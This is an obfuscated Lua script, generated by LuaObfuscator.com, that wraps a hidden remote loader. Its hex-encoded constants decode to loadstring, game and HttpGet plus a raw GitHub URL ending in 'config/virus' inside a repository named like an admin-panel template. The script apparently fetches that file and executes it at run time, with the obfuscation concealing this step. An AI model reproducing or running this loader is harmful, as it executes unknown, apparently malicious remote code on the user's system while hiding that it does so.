--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v80=0;while true do if (v80==0) then v19=v0(v3(v30,1,1));return "";end end else local v81=v2(v0(v30,16));if v19 then local v89=0;local v90;while true do if (v89==0) then v90=v5(v81,v19);v19=nil;v89=1;end if (v89==1) then return v90;end end else return v81;end end end);local function v20(v31,v32,v33) if v33 then local v82=0 -0 ;local v83;while true do if (v82==(0 -0)) then v83=(v31/((3 -1)^(v32-1)))%(2^(((v33-(2 -1)) -(v32-1)) + ((883 -263) -(555 + 64)))) ;return v83-(v83%(932 -(857 + 74))) ;end end else local v84=568 -(367 + 201) ;local v85;while true do if (v84==(927 -(214 + 713))) then v85=(1 + 1)^(v32-1) ;return (((v31%(v85 + v85))>=v85) and ((1638 -(1523 + 114)) + 0)) or (877 -(254 + 28 + 595)) ;end end end end local function v21() local v34=(1044 + 21) -(68 + 222 + 775) ;local v35;while true do if (v34==(1271 -(226 + 1044))) then return v35;end if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + 1 ;v34=118 -(32 + 85) ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + (959 -(892 + 65)) ;return (v37 * (610 -354)) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + ((12 -7) -2) );v18=v18 + ((6 + 1) -3) ;return (v41 * (16777566 -(87 + 263))) + (v40 * (65716 -(67 + 113))) + (v39 * (188 + 68)) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=3 -2 ;local v45=(v20(v43,953 -(802 + 150) ,20) * (2^(85 -53))) + v42 ;local v46=v20(v43,37 -16 ,23 + 8 );local v47=((v20(v43,1029 -(915 + 82) )==(2 -1)) and  -((443 -(416 + 26)) + 0)) or ((3 -2) -0) ;if (v46==(1187 -(1069 + 118))) then if (v45==0) then return v47 * (0 -0) ;else v46=(1 + 0) -(0 -0) ;v44=0 + (438 -(145 + 293)) ;end elseif (v46==2047) then return ((v45==(0 -0)) and (v47 * ((1 + (430 -(44 + 386)))/(791 -(368 + 423))))) or (v47 * NaN) ;end return v8(v47,v46-(3214 -2191) ) * (v44 + (v45/((20 -((1496 -(998 + 488)) + 8))^(199 -147)))) ;end local function v25(v48) local v49=0 -0 ;local v50;local v51;while true do if (v49==(1 + 0 + 0)) then v50=v3(v16,v18,(v18 + v48) -(1 + 0) );v18=v18 + v48 ;v49=2;end if (((2657 -1885) -(201 + 571))==v49) then v50=nil;if  not v48 then local v97=(2885 -(760 + 987)) -(116 + 1022) ;while true do if (v97==0) then v48=v23();if (v48==((1913 -(1789 + 124)) -(766 -(745 + 21)))) then return "";end break;end end end v49=1 + 0 ;end if (v49==(7 -(2 + 3))) then v51={};for v91=3 -2 , #v50 do v51[v91]=v2(v1(v3(v50,v91,v91)));end v49=10 -7 ;end if (v49==(862 -(814 + 45))) then return v6(v51);end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 0;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();while true do local v65=(function() return 0;end)();while true do if (v65==(2 -1)) then if (v52==2) then for v101= #"!",v23() do local v102=(function() return 0;end)();local v103=(function() return;end)();while true do if ((0 -0)==v102) then v103=(function() return v21();end)();if (v20(v103, #":", #"<")==0) then local v156=(function() return 0;end)();local v157=(function() return;end)();local v158=(function() return;end)();local v159=(function() return;end)();while true do if (v156==3) then if (v20(v158, #"-19", #"-19")== #":") then v159[ #".dev"]=(function() return v58[v159[ #"xnxx"]];end)();end v53[v101]=(function() return v159;end)();break;end if (v156~=(243 -(187 + 54))) then else if (v20(v158, #"~", #"]")~= #"~") then else v159[2]=(function() return v58[v159[782 -(162 + 618) ]];end)();end if (v20(v158,2 + 0 ,2 + 0 )~= #"~") then else v159[ #"19("]=(function() return v58[v159[ #"nil"]];end)();end v156=(function() return 6 -3 ;end)();end if (v156==(0 -0)) then local v165=(function() return 0 + 0 ;end)();while true do if (v165~=1) then else v156=(function() return 1;end)();break;end if (v165==(1636 -(1373 + 263))) then v157=(function() return v20(v103,1002 -(451 + 549) , #"nil");end)();v158=(function() return v20(v103, #"0836",2 + 4 );end)();v165=(function() return 1;end)();end end end if (v156==(1 -0)) then local v166=(function() return 0;end)();while true do if ((1 -0)~=v166) then else v156=(function() return 1386 -(746 + 638) ;end)();break;end if (v166~=(0 + 0)) then else v159=(function() return {v22(),v22(),nil,nil};end)();if (v157==(341 -(218 + 123))) then local v173=(function() return 0;end)();while true do if (v173~=(1581 -(1535 + 46))) then else v159[ #"xxx"]=(function() return v22();end)();v159[ #"http"]=(function() return v22();end)();break;end end elseif (v157== #"}") then v159[ #"xnx"]=(function() return v23();end)();elseif (v157==2) then v159[ #"asd"]=(function() return v23() -(2^(16 + 0)) ;end)();elseif (v157~= #"xxx") then else local v178=(function() return 0;end)();local v179=(function() return;end)();while true do if (v178==0) then v179=(function() return 0 + 0 ;end)();while true do if (v179==(560 -(306 + 254))) then v159[ #"nil"]=(function() return v23() -(2^(1 + 15)) ;end)();v159[ #"asd1"]=(function() return v22();end)();break;end end break;end end end v166=(function() return 1 -0 ;end)();end end end end end break;end end end for v104= #"[",v23() do v54[v104-#"[" ]=(function() return v28();end)();end return v56;end break;end if (v65==(1467 -(899 + 568))) then if (v52== #"|") then local v98=(function() return 0 + 0 ;end)();while true do if (v98~=(2 -1)) then else for v139= #"]",v57 do local v140=(function() return 0;end)();local v141=(function() return;end)();local v142=(function() return;end)();local v143=(function() return;end)();while true do if (v140==(604 -(268 + 335))) then v143=(function() return nil;end)();while true do if (v141== #"<") then if (v142== #" ") then v143=(function() return v21()~=0 ;end)();elseif (v142==2) then v143=(function() return v24();end)();elseif (v142== #"91(") then v143=(function() return v25();end)();end v58[v139]=(function() return v143;end)();break;end if (v141~=0) then else local v168=(function() return 0;end)();local v169=(function() return;end)();while true do if (v168==0) then v169=(function() return 290 -(60 + 230) ;end)();while true do if (v169~=(572 -(426 + 146))) then else v142=(function() return v21();end)();v143=(function() return nil;end)();v169=(function() return 1 + 0 ;end)();end if (v169==1) then v141=(function() return  #"}";end)();break;end end break;end end end end break;end if (v140==(1456 -(282 + 1174))) then local v160=(function() return 0;end)();local v161=(function() return;end)();while true do if (v160==0) then v161=(function() return 811 -(569 + 242) ;end)();while true do if (0~=v161) then else v141=(function() return 0 -0 ;end)();v142=(function() return nil;end)();v161=(function() return 1 + 0 ;end)();end if (v161==(1025 -(706 + 318))) then v140=(function() return 1252 -(721 + 530) ;end)();break;end end break;end end end end end v56[ #"nil"]=(function() return v21();end)();v98=(function() return 1273 -(945 + 326) ;end)();end if (v98~=0) then else v57=(function() return v23();end)();v58=(function() return {};end)();v98=(function() return 1;end)();end if (v98~=2) then else v52=(function() return 2;end)();break;end end end if (v52~=0) then else local v99=(function() return 0 -0 ;end)();local v100=(function() return;end)();while true do if (v99~=(0 + 0)) then else v100=(function() return 0;end)();while true do if (v100~=0) then else v53=(function() return {};end)();v54=(function() return {};end)();v100=(function() return 1;end)();end if (2~=v100) then else v52=(function() return  #" ";end)();break;end if (v100==1) then v55=(function() return {};end)();v56=(function() return {v53,v54,nil,v55};end)();v100=(function() return 2 + 0 ;end)();end end break;end end end v65=(function() return 1501 -(1408 + 92) ;end)();end end end end local function v29(v59,v60,v61) local v62=v59[1087 -(461 + 625) ];local v63=v59[1290 -(993 + 295) ];local v64=v59[1 + 2 ];return function(...) local v66=v62;local v67=v63;local v68=v64;local v69=v27;local v70=1 + 0 ;local v71= -(1172 -(418 + 753));local v72={};local v73={...};local v74=v12("#",...) -(1 + 0) ;local v75={};local v76={};for v86=0 + 0 + 0 ,v74 do if (v86>=v68) then v72[v86-v68 ]=v73[v86 + (2 -1) + 0 ];else v76[v86]=v73[v86 + (1934 -(565 + 1368)) ];end end local v77=(v74-v68) + 1 + 0 ;local v78;local v79;while true do v78=v66[v70];v79=v78[530 -(406 + 123) ];if (v79<=3) then if ((v79<=(1770 -((6577 -4828) + 20))) or (142>=4749)) then if (v79>(405 -(118 + 287))) then v76[v78[(1662 -(1477 + 184)) + 1 ]]=v78[1325 -(1249 + 73) ];else v76[v78[1 + 1 ]]();end elseif (v79==(1147 -(466 + 679))) then local v108=0 -0 ;local v109;local v110;while true do if ((3926<=4134) and (v108==((2 -0) -1))) then v76[v109 + (1901 -(106 + 1672 + 122)) ]=v110;v76[v109]=v110[v78[2 + 2 ]];break;end if (v108==(0 + 0)) then v109=v78[5 -3 ];v110=v76[v78[5 -2 ]];v108=1 + 0 ;end end else do return;end end elseif (v79<=(13 -8)) then if ((v79==(3 + (857 -(564 + 292)))) or (164>=2785)) then v76[v78[116 -(4 + 110) ]]=v61[v78[587 -(57 + 527) ]];else local v113=v78[1429 -(41 + 1386) ];v76[v113]=v76[v113](v13(v76,v113 + (104 -(17 + 86)) ,v71));end elseif ((v79<=(16 -10)) or (525==2109)) then local v115;local v116,v117;local v118;local v119;v76[v78[4 -2 ]]={};v70=v70 + 1 + 0 ;v78=v66[v70];v76[v78[3 -1 ]]=v61[v78[(13 -5) -5 ]];v70=v70 + 1 ;v78=v66[v70];v76[v78[5 -3 ]]=v61[v78[3]];v70=v70 + ((471 -(244 + 60)) -(94 + 28 + 44)) ;v78=v66[v70];v119=v78[1331 -(797 + 532) ];v118=v76[v78[5 -2 ]];v76[v119 + (3 -2) ]=v118;v76[v119]=v118[v78[4 + 0 ]];v70=v70 + (1203 -(373 + 829)) ;v78=v66[v70];v76[v78[733 -(476 + 255) ]]=v78[3];v70=v70 + (1131 -(369 + 761)) ;v78=v66[v70];v119=v78[2 + 0 ];v116,v117=v69(v76[v119](v13(v76,v119 + 1 + 0 ,v78[5 -2 ])));v71=(v117 + v119) -(66 -(30 + (511 -(41 + 435)))) ;v115=0 + (1001 -(938 + 63)) ;for v136=v119,v71 do v115=v115 + (239 -(64 + 174)) ;v76[v136]=v116[v115];end v70=v70 + 1 + 0 ;v78=v66[v70];v119=v78[1259 -(1043 + 214) ];v76[v119]=v76[v119](v13(v76,v119 + (3 -(2 + 0)) ,v71));v70=v70 + ((1342 -(936 + 189)) -(42 + 58 + 116)) ;v78=v66[v70];v76[v78[(2827 -(1565 + 48)) -(323 + 889) ]]();v70=v70 + (2 -1) ;v78=v66[v70];do return;end elseif ((33==33) and (v79>(587 -(223 + 138 + 219)))) then local v144=v78[2 + 0 ];local v145,v146=v69(v76[v144](v13(v76,v144 + ((1459 -(782 + 356)) -(53 + 267)) ,v78[1 + 2 ])));v71=(v146 + v144) -(414 -(15 + 398)) ;local v147=1504 -(363 + 1141) ;for v154=v144,v71 do local v155=982 -(18 + (1231 -(176 + 91))) ;while true do if (v155==((0 -0) -0)) then v147=v147 + 1 + 0 ;v76[v154]=v145[v147];break;end end end else v76[v78[2 + 0 ]]={};end v70=v70 + (851 -(20 + 830)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403633Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F626179757472697769626F776F31372F61646D696E2D6C74652D6C697665776972652F726566732F68656164732F6D61737465722F636F6E6669672F766972757300094Q00067Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000200046Q00013Q00024Q0001000100016Q00017Q00",v9(),...);
